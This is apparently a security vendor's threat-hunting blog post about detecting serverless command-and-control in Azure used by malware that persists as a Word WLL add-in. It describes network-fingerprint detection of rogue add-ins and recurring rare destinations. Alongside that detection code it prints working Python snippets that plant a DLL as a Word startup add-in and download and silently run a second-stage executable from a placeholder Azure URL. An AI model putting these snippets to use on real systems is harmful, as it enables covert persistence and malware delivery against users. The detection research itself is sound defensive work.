
Threat Hunting Series: Detecting Command & Control in the Cloud

There are certain types of sophisticated threat behaviors that are generally considered “impossible” to detect on the network. This blog post launches a series examining some of these cases. Let’s take a look at the first one.

Case Study: Serverless C2 in the cloud, from malware persisting with low privileges

A threat hunting engagement with a financial services client surfaced a situation where the C2 was TLS encrypted, as most traffic is these days, but the C2 server was actually “serverless” code running in the Azure cloud. In this scenario, all that is seen on the network is an encrypted tunnel to a subdomain of azurewebsites.net. In many networks there can be thousands of unique sessions per day to hundreds of subdomains of azurewebsites.net. To make matters worse, traditional approaches to TLS fingerprinting (such as JA3) are quite ineffective at making sense of this traffic, because a diverse mix of background updaters, web browsers, IoT clients, and more all interact with the Azure cloud.

The malware in question persists as an Office add-in, which complicates detection on both the network and the endpoint itself. The malware only runs when certain Office applications are started (which, depending on the victim, could be quite frequent). And because it runs inside the Office process, it is more difficult to detect on the endpoint. Even worse, it is possible to load malicious add-ins without elevated permissions, user intervention, or notification, and a malicious add-in can download and run other executables without the user’s knowledge using normal user-level permissions.

This post reconstructs the scenario to show how simple and nefarious these threats are, and how Awake effectively detects extremely sophisticated threats. A separate post examines some of the exciting detection creation capabilities we offer security analysts in the latest Awake Security Platform release.

William Knowles at MWR Labs wrote a fantastic piece on Office persistence in which he highlights various persistence techniques, including one known as WLL add-ins for Word. In short, you:

  1. Take a malicious DLL
  2. Put it in a directory that unprivileged users have access to (%APPDATA%\Microsoft\Word\STARTUP\)
  3. Change the extension from .dll to .wll

And that’s it. Word will run the code in the .dll every time the application is opened. Similar capabilities exist for Excel, PowerPoint, etc.


Figure 1: Drop the malicious .dll in this unrestricted directory, change the extension from .dll to .wll, and voila! Instant persistence. Word will execute whatever is in DllMain().
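To make the persistence step concrete, here is a minimal sketch of how a dropper could stage a WLL add-in, assuming the standard per-user Word startup folder. The file names are illustrative, and the snippet is intended only for reproducing the technique in a lab.

```python
import os
import shutil

# Per-user Word startup folder; %APPDATA% already resolves to ...\AppData\Roaming.
WORD_STARTUP = os.path.expandvars(r"%APPDATA%\Microsoft\Word\STARTUP")

def install_wll(dll_path: str) -> str:
    """Copy a DLL into Word's startup folder with a .wll extension (no elevation needed)."""
    os.makedirs(WORD_STARTUP, exist_ok=True)
    wll_name = os.path.splitext(os.path.basename(dll_path))[0] + ".wll"
    target = os.path.join(WORD_STARTUP, wll_name)
    shutil.copyfile(dll_path, target)
    return target

# Example (hypothetical path): install_wll(r"C:\Users\victim\Downloads\payload.dll")
```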

But, what if you’ve disabled add-ins?

Even if you have configured Word to disable add-ins, it doesn’t matter: that setting does indeed disable add-ins, except WLLs.

Figure 2: For WLL add-ins, this setting is for decoration only. Malicious .wll add-ins will still load.

So, what can you do with such an add-in? For starters, you can download and run other executables.

If the malicious .dll is completely self-contained (meaning it doesn’t need to download and run other files), then examining the process will show nothing unusual, because all the code is running inside Word.

Figure 3: The process when the add-in does not execute other applications. The code runs within WINWORD.exe.

One disadvantage to a completely self-contained .dll is that static detection is easier since the single .dll will likely contain a high percentage of suspicious functionality.
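As a rough illustration of why a self-contained DLL stands out statically, the sketch below scores a binary by the fraction of its imports that look loader-like. This is not how any particular product works; it assumes the third-party pefile library, and the “suspicious” import list is illustrative.

```python
import pefile  # third-party: pip install pefile

# Imports that often (though not always) indicate downloader/loader behavior.
SUSPICIOUS_IMPORTS = {
    b"URLDownloadToFileA", b"URLDownloadToFileW",
    b"WinExec", b"ShellExecuteA", b"ShellExecuteW",
    b"InternetOpenUrlA", b"InternetOpenUrlW",
}

def suspicious_import_ratio(path: str) -> float:
    """Return the fraction of a PE file's imported functions that look loader-like."""
    pe = pefile.PE(path, fast_load=True)
    pe.parse_data_directories(
        directories=[pefile.DIRECTORY_ENTRY["IMAGE_DIRECTORY_ENTRY_IMPORT"]])
    names = [imp.name
             for entry in getattr(pe, "DIRECTORY_ENTRY_IMPORT", [])
             for imp in entry.imports if imp.name]
    if not names:
        return 0.0
    return sum(1 for n in names if n in SUSPICIOUS_IMPORTS) / len(names)

# A fully self-contained implant tends to score higher here than a bare-bones
# loader padded with benign, red-herring imports.
```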

The attackers, in this case, created an add-in that is just a simple loader and clean-up for other executables. DLLs with simple functionality are usually more difficult to detect statically as malicious because they don’t have many overtly suspicious-looking features. Adding a few red-herring imports that are frequently used by legitimate programs (and not malware) makes detection even less likely. Figure 4 shows the example reconstructed for this blog, which uses a simple add-in to download, execute, and then clean up other malicious executables.

Figure 4: Under the WINWORD.EXE process is a child process with the same name (WINWORD.exe); however, the child WINWORD is not signed by Microsoft.

The executable downloaded and executed from the Internet is shown as a child process of WINWORD.exe. This file was also named WINWORD.exe, but seeing conhost.exe tells us the second WINWORD is not a GUI application. It is a console application and is hidden from the user because it is ultimately launched in a hidden state by ShellExecute. Also, the child WINWORD process is not signed by Microsoft. This is the malicious second-stage binary.
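For the lab reconstruction, the hidden second-stage launch boils down to a single ShellExecute call with the hide flag. The sketch below (Windows only, placeholder URL) shows the shape of that behavior; it is illustrative, not the actual sample.

```python
import ctypes
import os
import tempfile
import urllib.request

SW_HIDE = 0  # nShowCmd value: launch with no visible window

def fetch_and_run_hidden(url: str) -> None:
    """Download an executable and launch it with a hidden window via ShellExecuteW (Windows only)."""
    fd, path = tempfile.mkstemp(suffix=".exe")
    os.close(fd)
    urllib.request.urlretrieve(url, path)
    # Console binaries still spawn conhost.exe even when hidden -- the
    # tell-tale visible in Figure 4.
    ctypes.windll.shell32.ShellExecuteW(None, "open", path, None, None, SW_HIDE)

# Placeholder endpoint; the real sample pulled its second stage from an
# azurewebsites.net function.
# fetch_and_run_hidden("https://example.azurewebsites.net/api/stage2")
```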

Unfortunately, detectability gets worse when downloading executables from the Internet.

Serverless C2

If you’re not already terrified of the potential impact of serverless C2 on SOC operations, you may want to skip this section so you can continue sleeping well at night.

In the “good old days”, if you wanted to set up a server, you needed to find someplace to put it. Colocation eventually gave way to virtual servers, which are easier to manage in certain ways, but you still had to manage an entire server instance just to run some simple task (like C2). At the end of the day, most C2/botnet controllers were relatively simple PHP applications, yet the attacker still had to manage a full server to accomplish that relatively simple task.

Serverless computing has eliminated all that headache. Now you can take your web app code (such as that PHP-based C2), upload it to a serverless function provider, and it just works, without needing to worry about the underlying system running the app. Just as functions in code take some input and return some output, so do serverless functions. The difference is that you pass parameters and data into a serverless “function” with a GET or POST request and receive the results in a web response.
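To illustrate the request/response model (not the actual attacker code), here is a minimal HTTP-triggered handler in the style of the Azure Functions Python programming model. The tasking logic and identifiers are made up, and deploying it would also require the usual function.json binding configuration.

```python
import azure.functions as func  # Azure Functions Python worker library

def main(req: func.HttpRequest) -> func.HttpResponse:
    """HTTP-triggered function: input arrives in a GET/POST request,
    output leaves as an ordinary HTTPS response."""
    agent_id = req.params.get("id", "unknown")
    # In a benign app this would be business logic; in the C2 case it is a
    # tasking lookup keyed by the requesting implant (identifiers are made up).
    tasking = {"agent-01": "sleep", "agent-02": "collect"}
    return func.HttpResponse(tasking.get(agent_id, "noop"), status_code=200)
```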

This is terrifying from a threat detection and hunting perspective because the vast majority of a company’s Internet traffic is already going to Microsoft, Google, Amazon, and Cloudflare – and all of it is pretty much encrypted, too. When running this way, the C2 traffic has the same hosting, certificate, and server characteristics as the vast majority of traffic to/from most enterprises. As our customer pointed out to us, they have yet to find a Network Traffic Analysis (NTA) solution that can handle a situation like this.

Making the Impossible Possible

Network tools have been defeated by many modern threat scenarios because they haven’t evolved beyond outdated thinking that locks them within the confines of individual sessions and protocols. The reality is that threat detection depends on understanding applications and how they use sessions and protocols over time.

In the context of this post, what happens when Microsoft Word is started up? The answer is different depending on the version of Office, how it is licensed, and the Windows version you’re running on. But there is a set of events in most recent versions analogous to the sequence shown below. For the systems used in this post, you will see a handful of requests made (in order) to the following locations as the application starts up:

  1. Several [a-z]-ring.msedge.net connections
  2. Possible ocws.officeapps.live.com connections
  3. Finally fp.msedge.net

Figure 5: Word starting up with no add-ins present

However, you’ll see the following if an add-in is loaded that communicates on the network:

  1. Several <a single letter>-ring.msedge.net connections
  2. <request(s) from add-in(s)>
  3. Possible ocws.officeapps.live.com connections
  4. Finally fp.msedge.net

Figure 6: Word starting up, with the malicious add-in present. It downloads and executes the second stage payload from an azurewebsites.net function.

If we stop limiting ourselves to single sessions, then to identify network-connected add-ins like this we simply need to:

  1. Identify the “network fingerprint” of Word starting up
  2. Then identify the additional add-in connections
  3. Alert to “add-in connections that are not common”

The following screenshot shows a detection in Awake doing exactly that.

Figure 7: A detection in Awake that identifies the application fingerprint of Word starting up, identifies plug-ins making requests during the start-up, then returns those that are uncommon for the enterprise.

As the caption in the screenshot above says, you see a “recipe” that extracts the connections embedded in Word’s start-up application fingerprint, then returns the outliers, which in turn trigger threat behavior detections in the Awake Security Platform.

The underlying detection logic is more complicated, but for the discerning and skeptical reader, a look at it is included below. And you should be skeptical if you understand how substantial a breakthrough this capability is for network threat detection!

Figure 8: Everyday users typically don’t interact with raw underpinnings like this, but for the curious reader, the detection works by taking the fingerprint described earlier, extracting additional embedded connections, then alerting to the ones that are rare. More fingerprints and versions are being added all the time, including by our customers.
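For readers who want something more tangible than a screenshot, the following Python sketch approximates the logic Figure 8 describes. It is not the Awake recipe language; it assumes Word start-up windows have already been carved out of per-device session records, and the patterns and rarity threshold are illustrative.

```python
import re
from collections import defaultdict

# Baseline servers contacted when Word starts up (see Figures 5 and 6).
STARTUP_FINGERPRINT = [
    re.compile(r"^[a-z]-ring\.msedge\.net$"),
    re.compile(r"^ocws\.officeapps\.live\.com$"),
    re.compile(r"^fp\.msedge\.net$"),
]

def is_startup_traffic(server_name: str) -> bool:
    return any(p.match(server_name) for p in STARTUP_FINGERPRINT)

def embedded_addin_connections(window):
    """Given the time-ordered server names seen from one device during a Word
    start-up window, return the ones that are not part of the baseline."""
    return [s for s in window if not is_startup_traffic(s)]

def rare_addin_destinations(windows, max_devices=3):
    """windows: iterable of (device, [server_name, ...]) start-up windows.
    Keep only add-in destinations contacted by very few devices enterprise-wide."""
    devices_per_server = defaultdict(set)
    for device, window in windows:
        for server in set(embedded_addin_connections(window)):
            devices_per_server[server].add(device)
    return {s for s, devs in devices_per_server.items() if len(devs) <= max_devices}
```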

If you also understand the difficulty of addressing cases like this with other network traffic tools, then this observation should be most exciting to you: with the ability to write true TTP-level rules like this, we not only catch the challenging cases like serverless C2, we also catch all rogue/uncommon add-ins with this single detection.

In the previous example, the serverless C2 is caught because of the surrounding contextual sessions seen when Word starts up. But what happens when the serverless C2 malware doesn’t run as an add-in and instead runs as a once-a-day scheduled task, so there aren’t meaningful surrounding sessions to analyze?

That challenge is even easier to address in Awake. In those cases, we simply look for the least common recurrent serverless endpoints, as shown here:

Figure 9: General-purpose persistence detection!

Figure 9 shows a detection recipe that can alert if traffic is seen:

  1. To a destination that is rare for the enterprise, and
  2. That activity is seen [in the case pictured above] at least five of the past 14 days.

We could easily change those numbers to be three of the past seven days, or even change the recipe itself to represent almost any attacker TTP – like “alert when a device connects directly to an IP address (no DNS request) for 3 of the past 7 days.”
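As a rough sketch of that recipe (again, not the Awake recipe language), the function below assumes a table of daily observations that already records how many devices enterprise-wide contact each destination, and flags device/destination pairs that are both rare and recurrent. The thresholds mirror the numbers in the text.

```python
from collections import defaultdict
from datetime import date, timedelta

def recurrent_rare_destinations(observations, rare_device_max=3,
                                min_days=5, lookback_days=14, today=None):
    """observations: iterable of (device, day, destination, device_count), where
    device_count is how many devices enterprise-wide contact that destination.
    Returns (device, destination) pairs that are rare for the enterprise AND
    seen on at least `min_days` of the last `lookback_days`."""
    today = today or date.today()
    cutoff = today - timedelta(days=lookback_days)
    days_seen = defaultdict(set)
    for device, day, destination, device_count in observations:
        if day >= cutoff and device_count <= rare_device_max:
            days_seen[(device, destination)].add(day)
    return {pair for pair, days in days_seen.items() if len(days) >= min_days}

# The "3 of the past 7 days" variant is just min_days=3, lookback_days=7.
```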

It seems I’ve digressed at this point. But that’s easy to do when you’ve spent a career doing threat detection and finally get the opportunity to use a capability that allows you to define and detect almost any threat behavior imaginable.

Have some challenging threat cases to address on the network? Drop us a line and let’s see if we can solve them!

Authors: Gary Golomb and Troy Kent

Gary Golomb

Co-Founder & Chief Scientist